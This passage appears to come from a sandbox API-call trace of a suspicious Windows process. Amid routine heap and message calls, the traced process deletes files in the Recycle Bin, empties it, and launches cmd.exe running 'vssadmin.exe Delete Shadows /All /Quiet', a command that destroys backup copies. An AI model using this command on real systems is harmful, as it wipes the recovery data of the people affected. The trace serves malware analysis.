hHeap=0x770000) returned 1 [0044.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c388 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c340 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c3b8 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c370 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c610 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c6b8 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c688 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c628 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c478 [0044.075] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c418 [0044.075] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.075] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.075] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.075] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.075] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.075] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.075] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ed268 | out: hHeap=0x770000) returned 1 [0044.076] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.076] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.076] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.076] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.076] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.076] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0044.076] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0044.077] CreateFileW (lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.077] FreeLibrary (hLibModule=0x76e10000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afcf8 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd88 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd38 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd08 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd58 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd68 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afda8 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c1a8 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe08 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c418 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c478 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6b8 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c628 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c610 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c688 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3b8 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c370 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c340 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c388 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c310 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c358 | out: hHeap=0x770000) returned 1 [0044.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c328 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c2f8 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c2e0 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c2b0 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c280 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c2c8 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c298 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c268 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c250 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c220 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c1f0 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c238 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c208 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c1d8 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c1c0 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c190 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5a20 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.078] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0044.078] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.078] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af358 | out: hHeap=0x770000) returned 1 [0044.078] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.078] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0044.078] FreeLibrary (hLibModule=0x76e10000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0044.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdc8 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd28 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe08 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1530 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c268 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3d0 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c490 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6e8 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c538 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c460 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4a8 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c0e8 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c0a0 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c0d0 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c100 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c118 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c148 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c130 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c178 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c160 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c5e0 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c5b0 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c448 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c2c8 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c280 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c298 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0044.079] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.079] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.079] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.079] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.079] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0044.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe78 | out: hHeap=0x770000) returned 1 [0044.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.080] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0044.080] FreeLibrary (hLibModule=0x76e10000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe68 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4f0 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c1d8 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4c0 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c208 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c238 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c250 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c1f0 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c520 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c220 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c400 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af358 | out: hHeap=0x770000) returned 1 [0044.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.080] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.080] GetFullPathNameW (in: lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", nBufferLength=0x7fff, lpBuffer=0x69ee78, lpFilePart=0x0 | out: lpBuffer="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpFilePart=0x0) returned 0x3e [0044.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3a0 | out: hHeap=0x770000) returned 1 [0044.080] FindFirstFileW (in: lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*", lpFindFileData=0x6aeec0 | out: lpFindFileData=0x6aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName=".", cAlternateFileName="")) returned 0x7ed268 [0044.081] FindNextFileW (in: hFindFile=0x7ed268, lpFindFileData=0x6aeec0 | out: lpFindFileData=0x6aeec0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="..", cAlternateFileName="")) returned 1 [0044.081] FindNextFileW (in: hFindFile=0x7ed268, lpFindFileData=0x6aeec0 | out: lpFindFileData=0x6aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.081] DeleteFileW (lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0044.088] FindNextFileW (in: hFindFile=0x7ed268, lpFindFileData=0x6aeec0 | out: lpFindFileData=0x6aeec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0044.088] FindClose (in: hFindFile=0x7ed268 | out: hFindFile=0x7ed268) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5a20 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd78 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c4d8 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe38 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b5860 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe78 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c5c8 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c3e8 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0044.089] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2a8 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c6a0 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c658 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afec8 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c598 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c718 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0044.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c700 | out: hHeap=0x770000) returned 1 [0044.089] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.091] SHEmptyRecycleBinW (hwnd=0x0, pszRootPath=0x0, dwFlags=0x7) returned 0x8000ffff [0044.733] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X64", cchCount1=3, lpString2="X64", cchCount2=3) returned 2 [0044.733] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0044.733] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0044.733] Wow64RevertWow64FsRedirection (OlValue=0x1) returned 1 [0044.733] FreeLibrary (hLibModule=0x76e10000) returned 1 [0044.733] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.733] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0044.733] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6af174 | out: lpSystemTimeAsFileTime=0x6af174*(dwLowDateTime=0x1a2469a0, dwHighDateTime=0x1d5e3d9)) [0044.733] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0044.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2ac0 [0044.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba40 [0044.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe08 [0044.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8380 [0044.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afde8 [0044.734] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x6aeb88, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba70 [0044.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9f8 [0044.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd28 [0044.734] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0044.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7ce118 [0044.734] GetCurrentDirectoryW (in: nBufferLength=0x26, lpBuffer=0x7ce118 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.734] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 3382479|vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x6aef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6aef58 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 3382479|vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x6aef58*(hProcess=0x234, hThread=0x238, dwProcessId=0xb4c, dwThreadId=0xb50)) returned 1 [0044.742] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, 